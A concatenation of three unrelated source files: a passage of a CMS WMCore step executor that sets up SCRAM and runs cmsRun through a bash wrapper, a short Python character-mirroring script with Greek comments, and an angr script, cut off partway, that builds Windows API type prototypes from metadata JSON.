psetTweak = self.step.application.command.psetTweak
self.stepSpace.getFromSandbox(psetFile)
if psetTweak:
self.stepSpace.getFromSandbox(psetTweak)
if hasattr(self.step, "pileup"):
self.stepSpace.getFromSandbox("pileupconf.json")
# add in ths scram env PSet manip script whatever happens
self.step.runtime.preScripts.append("SetupCMSSWPset")
return None
def execute(self, emulator=None):
"""
_execute_
"""
if emulator is not None:
return emulator.emulate(self.step, self.job)
logging.info("Steps.Executors.%s.execute called", self.__class__.__name__)
stepModule = "WMTaskSpace.%s" % self.stepName
overrides = {}
if hasattr(self.step, 'override'):
overrides = self.step.override.dictionary_()
self.failedPreviousStep = overrides.get('previousCmsRunFailure', False)
if self.failedPreviousStep:
# the previous cmsRun step within this task failed
# don't bother executing anything else then
msg = WM_JOB_ERROR_CODES[99108]
logging.critical(msg)
self._setStatus(99108, msg)
raise WMExecutionFailure(99108, "CmsRunFailure", msg)
# write the wrapper script to a temporary location
# I don't pass it directly through os.system because I don't
# trust that there won't be shell-escape shenanigans with
# arbitrary input files
scramSetup = self.step.application.setup.softwareEnvironment
scramCommand = self.step.application.setup.scramCommand
scramProject = self.step.application.setup.scramProject
scramArch = self.step.application.setup.scramArch
cmsswVersion = self.step.application.setup.cmsswVersion
jobReportXML = self.step.output.jobReport
cmsswCommand = self.step.application.command.executable
cmsswConfig = self.step.application.command.configuration
cmsswArguments = self.step.application.command.arguments
userTarball = ','.join(self.step.user.inputSandboxes)
userFiles = ','.join(self.step.user.userFiles)
logging.info('User files are %s', userFiles)
logging.info('User sandboxes are %s', userTarball)
scramArch = getSingleScramArch(scramArch)
multicoreSettings = self.step.application.multicore
try:
logging.info("CMSSW configured for %s cores and %s event streams",
multicoreSettings.numberOfCores, multicoreSettings.eventStreams)
except AttributeError:
logging.info("No value set for multicore numberOfCores or eventStreams")
logging.info("Executing CMSSW step")
#
# set any global environment variables
#
try:
os.environ['FRONTIER_ID'] = 'wmagent_%s' % (self.report.data.workload)
except Exception as ex:
logging.error('Have critical error in setting FRONTIER_ID: %s', str(ex))
logging.error('Continuing, as this is not a critical function yet.')
#
# scram bootstrap
#
scram = Scram(
command=scramCommand,
version=cmsswVersion,
initialise=self.step.application.setup.softwareEnvironment,
directory=self.step.builder.workingDir,
architecture=scramArch,
)
logging.info("Runing SCRAM")
try:
projectOutcome = scram.project()
except Exception as ex:
msg = WM_JOB_ERROR_CODES[50513]
msg += "\nDetails: %s" % str(ex)
logging.critical(msg)
raise WMExecutionFailure(50513, "ScramSetupFailure", msg)
if projectOutcome > 0:
msg = WM_JOB_ERROR_CODES[50513]
msg += "\nDetails: %s" % str(scram.diagnostic())
logging.critical(msg)
raise WMExecutionFailure(50513, "ScramSetupFailure", msg)
runtimeOutcome = scram.runtime()
if runtimeOutcome > 0:
msg = WM_JOB_ERROR_CODES[50513]
msg += "\nDetails: %s" % str(scram.diagnostic())
logging.critical(msg)
raise WMExecutionFailure(50513, "ScramSetupFailure", msg)
#
# pre scripts
#
logging.info("Running PRE scripts")
for script in self.step.runtime.preScripts:
# TODO: Exception handling and error handling & logging
scriptProcess = subprocess.Popen(
["/bin/bash"], shell=True, cwd=self.step.builder.workingDir,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
)
# BADPYTHON
invokeCommand = "export LD_LIBRARY_PATH=$LD_LIBRARY_PATH\n"
invokeCommand += "{} -m WMCore.WMRuntime.ScriptInvoke {} {} \n".format(sys.executable,
stepModule,
script)
logging.info(" Invoking command:\n%s", invokeCommand)
scriptProcess.stdin.write(encodeUnicodeToBytesConditional(invokeCommand, condition=PY3))
stdout, stderr = scriptProcess.communicate()
retCode = scriptProcess.returncode
if retCode > 0:
msg = "Error running command\n%s\n" % invokeCommand
msg += "%s\n %s\n %s\n" % (retCode, stdout, stderr)
logging.critical("Error running command")
logging.critical(msg)
raise WMExecutionFailure(50513, "PreScriptFailure", msg)
#
# pre scripts with scram
#
logging.info("RUNNING SCRAM SCRIPTS")
for script in self.step.runtime.scramPreScripts:
# invoke scripts with scram()
runtimeDir = getattr(self.step.runtime, 'scramPreDir', None)
invokeCommand = self.step.runtime.invokeCommand if hasattr(self.step.runtime, 'invokeCommand') else \
"%s -m WMCore.WMRuntime.ScriptInvoke %s" % (sys.executable, stepModule)
invokeCommand += " %s \n" % script
retCode = scram(invokeCommand, runtimeDir=runtimeDir)
if retCode > 0:
msg = "Error running command\n%s\n" % invokeCommand
msg += "%s\n " % retCode
msg += scram.diagnostic()
logging.critical(msg)
raise WMExecutionFailure(50513, "PreScriptScramFailure", msg)
configPath = "%s/%s-main.sh" % (self.step.builder.workingDir, self.stepName)
with open(configPath, 'w') as handle:
handle.write(CONFIG_BLOB)
# spawn this new process
# the script looks for:
# <SCRAM_COMMAND> <SCRAM_PROJECT> <CMSSW_VERSION> <JOB_REPORT> <EXECUTABLE> <CONFIG>
# open the output files
stdoutHandle = open(self.step.output.stdout, 'w')
stderrHandle = open(self.step.output.stderr, 'w')
args = ['/bin/bash',
configPath,
scramSetup,
scramArch,
scramCommand,
scramProject,
cmsswVersion,
jobReportXML,
cmsswCommand,
cmsswConfig,
userTarball,
userFiles,
cmsswArguments]
logging.info("Executing CMSSW. args: %s", args)
# possibly needed environment overrides for CMSSW call go here
envOverride = {}
# Do not pass WM PYTHONPATH to CMSSW environment
pythonPath = os.environ.get('PYTHONPATH', '')
envOverride['PYTHONPATH'] = ""
# work around problem with GSI authentication plugin and EOS at CERN
if socket.getfqdn().endswith("cern.ch"):
envOverride['XRD_LOADBALANCERTTL'] = "86400"
# some libraries linked with CMSSW need HOME in the environment
if 'HOME' not in os.environ:
envOverride['HOME'] = os.environ.get('PWD', "/")
os.environ.update(envOverride)
returnCode = subprocess.call(args, stdout=stdoutHandle, stderr=stderrHandle)
returnMessage = None
# Return PYTHONPATH to its original value, as this
# is needed for stepChain workflows, so other prescripts
# are able to find WMCore modules
envOverride['PYTHONPATH'] = pythonPath
os.environ.update(envOverride)
if returnCode != 0:
argsDump = {'arguments': args}
msg = "Error running cmsRun\n%s\n" % argsDump
try:
self.report.parse(jobReportXML, stepName=self.stepName)
(returnCode, returnMessage) = self.report.getStepExitCodeAndMessage(stepName=self.stepName)
msg += "CMSSW Return code: %s\n" % returnCode
except Exception as ex:
# If report parsing fails, report linux exit code
msg += "Linux Return code: %s\n" % returnCode
finally:
logging.critical(msg)
logging.critical("Error message: %s", returnMessage)
self._setStatus(returnCode, returnMessage)
raise WMExecutionFailure(returnCode, "CmsRunFailure", msg)
else:
self._setStatus(returnCode, returnMessage)
stdoutHandle.close()
stderrHandle.close()
try:
self.report.parse(jobReportXML, stepName=self.stepName)
except Exception as ex:
msg = WM_JOB_ERROR_CODES[50115]
msg += "\nDetails: %s" % str(ex)
raise WMExecutionFailure(50115, "BadJobReportXML", msg)
stepHelper = WMStepHelper(self.step)
typeHelper = stepHelper.getTypeHelper()
acquisitionEra = typeHelper.getAcqEra() or self.task.getAcquisitionEra()
processingVer = typeHelper.getProcVer() or self.task.getProcessingVersion()
processingStr = typeHelper.getProcStr() or self.task.getProcessingString()
prepID = typeHelper.getPrepId() or self.task.getPrepID()
globalTag = typeHelper.getGlobalTag()
validStatus = self.workload.getValidStatus()
inputPath = self.task.getInputDatasetPath()
campaign = self.workload.getCampaign()
cacheUrl, cacheDB, configID = stepHelper.getConfigInfo()
self.report.setValidStatus(validStatus=validStatus)
self.report.setGlobalTag(globalTag=globalTag)
self.report.setCampaign(campaign)
self.report.setPrepID(prepID)
self.report.setInputDataset(inputPath=inputPath)
self.report.setAcquisitionProcessing(acquisitionEra=acquisitionEra,
processingVer=processingVer,
processingStr=processingStr)
self.report.setConfigURL(configURL="%s;;%s;;%s" % (cacheUrl,
cacheDB,
configID))
# Attach info to files
self.report.addInfoToOutputFilesForStep(stepName=self.stepName, step=self.step)
self.report.checkForOutputFiles(stepName=self.stepName)
self.report.checkForAdlerChecksum(stepName=self.stepName)
self.report.checkForRunLumiInformation(stepName=self.stepName)
if self.step.output.keep != True:
self.report.killOutput()
else:
# Check that we only keep the desired output
for module in stepHelper.getIgnoredOutputModules():
self.report.deleteOutputModuleForStep(stepName=self.stepName, moduleName=module)
# Add stageout LFN to existing TFileService files
reportAnalysisFiles = self.report.getAnalysisFilesFromStep(self.stepName)
for reportAnalysisFile in reportAnalysisFiles:
newLFN = analysisFileLFN(reportAnalysisFile.fileName, self.step.user.lfnBase, self.job)
addAttributesToFile(reportAnalysisFile, pfn=reportAnalysisFile.fileName, lfn=newLFN, validate=False)
# Add analysis file entries for additional files listed in workflow
for fileName in stepHelper.listAnalysisFiles():
analysisFile = stepHelper.getAnalysisFile(fileName)
if os.path.isfile(analysisFile.fileName):
newLFN = analysisFileLFN(analysisFile.fileName, analysisFile.lfnBase, self.job)
self.report.addAnalysisFile(analysisFile.fileName, lfn=newLFN, Source='UserDefined',
pfn=os.path.join(os.getcwd(), analysisFile.fileName), validate=False)
return
def post(self, emulator=None):
"""
_post_
Post execution checkpointing
"""
if emulator is not None:
return emulator.emulatePost(self.step)
logging.info("Steps.Executors.%s.post called", self.__class__.__name__)
if self.report.getStepErrors(self.stepName) != {}:
# Then we had errors
# Go directly to spot specified in WMStep
return self.errorDestination
return None
CONFIG_BLOB = """#!/bin/bash
# Check to make sure the argument count is correct
REQUIRED_ARGUMENT_COUNT=5
if [ $# -lt $REQUIRED_ARGUMENT_COUNT ]
then
echo "Usage: `basename $0` <SCRAM_SETUP> <SCRAM_ARCH> <SCRAM_COMMAND> <SCRAM_PROJECT> <CMSSW_VERSION>\
<JOB_REPORT> <EXECUTABLE> <CONFIG> <USER_TARBALLS> <USER_FILES> [Arguments for cmsRun]"
exit 70
fi
# Extract the required arguments out, leaving an unknown number of
# cmsRun arguments
SCRAM_SETUP=$1
SCRAM_ARCHIT=$2
SCRAM_COMMAND=$3
SCRAM_PROJECT=$4
CMSSW_VERSION=$5
JOB_REPORT=$6
EXECUTABLE=$7
CONFIGURATION=$8
USER_TARBALL=$9
shift;shift;shift;shift;shift;
shift;shift;shift;shift;
# Can only do nine parameters at a time
USER_FILES=$1
shift;
echo "Setting up Frontier log level"
export FRONTIER_LOG_LEVEL=warning
echo "Beginning CMSSW wrapper script"
echo "$SCRAM_SETUP $SCRAM_ARCHIT $SCRAM_COMMAND $SCRAM_PROJECT"
echo "Performing SCRAM setup..."
$SCRAM_SETUP
echo "Completed SCRAM setup"
export SCRAM_ARCH=$SCRAM_ARCHIT
echo "Retrieving SCRAM project..."
# do the actual executing
$SCRAM_COMMAND project $SCRAM_PROJECT $CMSSW_VERSION
EXIT_STATUS=$?
if [ $EXIT_STATUS -ne 0 ]; then echo "Scram failed with exit code: $EXIT_STATUS"; exit 71; fi
cd $CMSSW_VERSION
EXIT_STATUS=$?
if [ $EXIT_STATUS -ne 0 ]; then echo "***\nCouldn't chdir: $EXIT_STATUS\n"; exit 72; fi
eval `$SCRAM_COMMAND runtime -sh`
EXIT_STATUS=$?
if [ $EXIT_STATUS -ne 0 ]; then echo "***\nCouldn't get scram runtime: $EXIT_STATUS\n*"; exit 73; fi
if [ -n "$USER_TARBALL" ] ; then
python2 -m WMCore.WMRuntime.Scripts.UnpackUserTarball $USER_TARBALL $USER_FILES
EXIT_STATUS=$?
if [ $EXIT_STATUS -ne 0 ]; then
echo "***\nCouldn't untar sandbox with python2: $EXIT_STATUS\n";
echo "***\nWill try with python2.6 as it might be an old CMSSW release!"
python2.6 -m WMCore.WMRuntime.Scripts.UnpackUserTarball $USER_TARBALL $USER_FILES
EXIT_STATUS=$?
if [ $EXIT_STATUS -ne 0 ]; then
echo "***\nCouldn't untar sandbox with python2.6: $EXIT_STATUS\n";
exit 74;
fi
fi
fi
echo "Completed SCRAM project"
cd ..
echo "Executing CMSSW"
echo "$EXECUTABLE -j $JOB_REPORT $CONFIGURATION"
$EXECUTABLE -j $JOB_REPORT $CONFIGURATION 2>&1 &
PROCID=$!
echo $PROCID > process.id
wait $PROCID
EXIT_STATUS=$?
echo "Complete"
echo "process id is $PROCID status is $EXIT_STATUS"
exit $EXIT_STATUS
"""
|
file = input("give an ascii file ") #Ζηταει απο τον χρηστη ενα file
for i in range(len(file)):
let = file[len(file)-i -1] #Διαβαζει απο το τελος τους χαρακτηρες
num = ord(let) # μετατροπη σε αριθμους
num2 = 128 - num # κατοπτρικο τους
ascii = chr(num2) # Τον μετατρεπω σε χαρακτηρα
print(ascii , end ="")
|
# Based on https://github.com/dfraze/binja_winmd/blob/main/main.py. Thank you, Dustin Fraze!
import json
import codecs
import sys
import logging
from collections import OrderedDict, defaultdict
from argparse import ArgumentParser
from pathlib import Path
import angr
from angr.sim_type import SimTypeFunction, SimTypeLong
from angr.utils.library import parsedcprotos2py
api_namespaces = {}
altnames = set()
class NoSuchType(Exception):
pass
class TypeLib:
def __init__(self):
self.named_types = {}
def get_named_type(self, name):
if name not in self.named_types:
print(f"Type {name} has not been declared before. Return void instead. We need backpatching.")
return angr.types.SimTypeBottom(label=name)
return self.named_types[name]
def add_named_type(self, name, ty):
self.named_types[name] = ty
typelib = TypeLib()
def kind_to_bn_type(kind):
if kind["Kind"] == "Native":
return get_bn_type_from_name(kind["Name"])
if kind["Kind"] == "ApiRef":
return typelib.get_named_type(kind["Name"])
def get_bn_type_from_name(name):
if name == "Byte":
return angr.types.SimTypeChar(signed=False, label="Byte")
elif name == "SByte":
return angr.types.SimTypeChar(signed=True, label="SByte")
elif name == "Char":
return angr.types.SimTypeChar(signed=True, label="Char")
elif name == "UInt16":
return angr.types.SimTypeShort(signed=False, label="UInt16")
elif name == "Int16":
return angr.types.SimTypeShort(signed=True, label="Int16")
elif name == "Int64":
return angr.types.SimTypeLongLong(signed=True, label="Int64")
elif name == "UInt32":
return angr.types.SimTypeInt(signed=False, label="UInt32")
elif name == "UInt64":
return angr.types.SimTypeLongLong(signed=False, label="UInt64")
elif name == "Int32":
return angr.types.SimTypeInt(signed=True, label="Int32")
elif name == "Single":
return angr.types.SimTypeFloat(size=32)
elif name == "Double":
return angr.types.SimTypeFloat(size=64)
elif name == "UIntPtr":
return angr.types.SimTypePointer(angr.types.SimTypeInt(signed=False, label="UInt"), label="UIntPtr")
elif name == "IntPtr":
return angr.types.SimTypePointer(angr.types.SimTypeInt(signed=True, label="Int"), label="IntPtr")
elif name == "Void":
return angr.types.SimTypeBottom(label="Void")
elif name == "Boolean":
return angr.types.SimTypeBool(label="Boolean")
elif name == "Guid":
#FIXME
return angr.types.SimTypeBottom(label="Guid")
else:
print(f"Unhandled Native Type: {name}")
sys.exit(-1)
def handle_json_type(t):
if t["Kind"] == "Native":
return get_bn_type_from_name(t["Name"])
if t["Kind"] == "PointerTo":
return angr.types.SimTypePointer(handle_json_type(t["Child"]))
if t["Kind"] == "Array":
if t["Shape"]:
return angr.types.SimTypeFixedSizeArray(handle_json_type(t["Child"]), length=int(t["Shape"]["Size"]))
else:
return angr.types.SimTypePointer(handle_json_type(t["Child"]))
if t["Kind"] == "ApiRef":
return typelib.get_named_type(t["Name"])
if t["Kind"] == "Struct":
for nested_type in t["NestedTypes"]:
typelib.add_named_type(nested_type["Name"], handle_json_type(nested_type))
fields = OrderedDict()
for field in t["Fields"]:
child_type = handle_json_type(field["Type"])
fields[field["Name"]] = child_type
return angr.types.SimStruct(fields, name=t["Name"])
if t["Kind"] == "LPArray":
return angr.types.SimTypePointer(handle_json_type(t["Child"]), label="LPArray")
if t["Kind"] == "Union":
for nested_type in t["NestedTypes"]:
typelib.add_named_type(nested_type["Name"], handle_json_type(nested_type))
members = { }
for field in t["Fields"]:
child_type = handle_json_type(field["Type"])
members[field["Name"]] = child_type
return angr.types.SimUnion(members)
if t["Kind"] == "MissingClrType":
return angr.types.SimTypeBottom(label="MissingClrType")
else:
print(f"Unhandled type: {t}")
sys.exit(0)
def create_angr_type_from_json(t):
if t["Kind"] == "NativeTypedef":
new_typedef = handle_json_type(t["Def"])
real_new_type = typelib.add_named_type(t["Name"], new_typedef)
elif t["Kind"] == "Enum":
ty = angr.types.SimTypeInt(signed=False, label=t["Name"])
typelib.add_named_type(t["Name"], ty)
# new_enum = binaryninja.types.Enumeration()
# for member in t["Values"]:
# new_enum.append(member["Name"], int(member["Value"]))
# real_new_type = binaryninja.types.Type.named_type_from_type(t["Name"], binaryninja.types.Type.enumeration_type(arch,new_enum))
# typelib.add_named_type(t["Name"], real_new_type)
elif t["Kind"] == "Struct":
real_new_type = handle_json_type(t)
typelib.add_named_type(t["Name"], real_new_type)
elif t["Kind"] == "FunctionPointer":
ret_type = handle_json_type(t["ReturnType"])
args = [ ]
arg_names = [ ]
for param in t["Params"]:
new_param = handle_json_type(param["Type"])
args.append(new_param)
arg_names.append(param["Name"])
typelib.add_named_type(t["Name"], angr.types.SimTypePointer(angr.types.SimTypeFunction(args, ret_type,
arg_names=arg_names)))
elif t["Kind"] == "Com":
typelib.add_named_type(t["Name"], angr.types.SimTypeBottom(label=t["Name"]))
# new_struct = binaryninja.types.Structure()
# for method in t["Methods"]:
# ret_type = handle_json_type(method["ReturnType"])
# param_list = []
# for param in method["Params"]:
# new_param = handle_json_type(param["Type"])
# real_new_param = binaryninja.types.FunctionParameter(new_param, param["Name"])
# param_list.append(real_new_param)
# new_func = binaryninja.types.Type.function(ret_type, param_list)
# new_struct.append(binaryninja.types.Type.pointer(arch, new_func), method["Name"])
# typelib.add_named_type(t["Name"], binaryninja.types.Type.structure_type(new_struct))
elif t["Kind"] == "ComClassID":
return None
elif t["Kind"] == "Union":
real_new_type = handle_json_type(t)
typelib.add_named_type(t["Name"], real_new_type)
return None
else:
print(f"Found unknown type kind: {t['Kind']}")
def do_it(in_dir, out_file):
p = Path(in_dir)
files = p.glob("*.json")
for file in files:
api_namespaces[file.stem] = json.load(codecs.open(file, "r", "utf-8-sig"))
# some undefined types
#typelib.add_named_type("BOOL", angr.types.SimTypeBool())
#typelib.add_named_type("PWSTR", angr.types.SimTypePointer(angr.types.SimTypeChar(label="wchar"))) # TODO: Add angr.types.SimTypeWChar
logging.info("Making a bunch of types...")
while True:
nosuchtype = 0
for namespace in api_namespaces:
metadata = api_namespaces[namespace]
types = metadata["Types"]
for t in types:
try:
create_angr_type_from_json(t)
except NoSuchType:
# skip this type for now
nosuchtype += 1
print(f"... missing {nosuchtype} types")
if not nosuchtype:
break
logging.info("Alright, now let's do some functions")
i = 1
func_count = 0
parsed_cprotos = defaultdict(list)
for namespace in api_namespaces:
metadata = api_namespaces[namespace]
logging.debug(f"+++ Processing namespace {namespace} ({i} of {len(api_namespaces)})")
i += 1
funcs = metadata["Functions"]
for f in funcs:
libname = f["DllImport"].lower()
ret_type = handle_json_type(f["ReturnType"])
args = [ ]
arg_names = [ ]
for param in f["Params"]:
new_param = handle_json_type(param["Type"])
if new_param is None:
import ipdb; ipdb.set_trace()
args.append(new_param)
arg_names.append(param["Name"])
new_func = angr.types.SimTypeFunction(args, ret_type, arg_names=arg_names)
new_func_name = f["Name"]
parsed_cprotos[libname].append((new_func_name, new_func, ""))
func_count += 1
# Some missing function declarations
missing_declarations = defaultdict(dict)
missing_declarations["kernel32"] = {
"InterlockedCompareExchange": SimTypeFunction((SimTypeLong(),)*3, SimTypeLong()),
"InterlockedCompareExchange64": SimTypeFunction((SimTypeLong(),)*5, SimTypeLong()),
"InterlockedDecrement": SimTypeFunction((SimTypeLong(),)*1, SimTypeLong()),
"InterlockedExchange": SimTypeFunction((SimTypeLong(),)*2, SimTypeLong()),
"InterlockedExchangeAdd": SimTypeFunction((SimTypeLong(),)*2, SimTypeLong()),
"InterlockedIncrement": SimTypeFunction((SimTypeLong(),)*1, SimTypeLong()),
"UTRegister": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegisterConsoleVDM": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegOpenUserClassesRoot": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SortCloseHandle": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WriteConsoleInputVDMW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegEnumValueW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseDllReadWriteIniFile": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"NlsCheckPolicy": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegGetKeySecurity": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"lstrlen": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"NlsGetCacheUpdateCount": SimTypeFunction([], SimTypeLong(signed=True)),
"OpenThreadToken": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetTermsrvAppInstallMode": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetConsoleFontInfo": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetCalendarMonthsInYear": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WerpNotifyLoadStringResourceEx": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RemoveLocalAlternateComputerNameW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetVDMCurrentDirectories": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleInputExeNameA": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegDisablePredefinedCacheEx": SimTypeFunction([], SimTypeLong(signed=True)),
"IdnToAscii": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LoadAppInitDlls": SimTypeFunction([], SimTypeLong(signed=True)),
"OpenConsoleW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ExitVDM": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegNotifyChangeKeyValue": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"AddLocalAlternateComputerNameW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegOpenKeyExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RtlMoveMemory": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegFlushKey": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegUnLoadKeyA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegisterConsoleIME": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegLoadMUIStringA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegCreateKeyExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CheckForReadOnlyResource": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegRestoreKeyW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"lstrcpy": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegEnumKeyExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CreateProcessAsUserW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RtlZeroMemory": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetConsoleNlsMode": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegGetValueA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"AdjustCalendarDate": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseSetLastNTError": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ShowConsoleCursor": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BasepCheckWinSaferRestrictions": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ReadConsoleInputExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegSetValueExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegQueryValueExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegDeleteValueA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegOpenCurrentUser": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CtrlRoutine": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RtlFillMemory": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"VerifyConsoleIoHandle": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"EnumerateLocalComputerNamesW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CloseProfileUserMapping": SimTypeFunction([], SimTypeLong(signed=True)),
"GetEraNameCountedString": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegisterWaitForSingleObjectEx": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"DosPathToSessionPathW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegSaveKeyExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
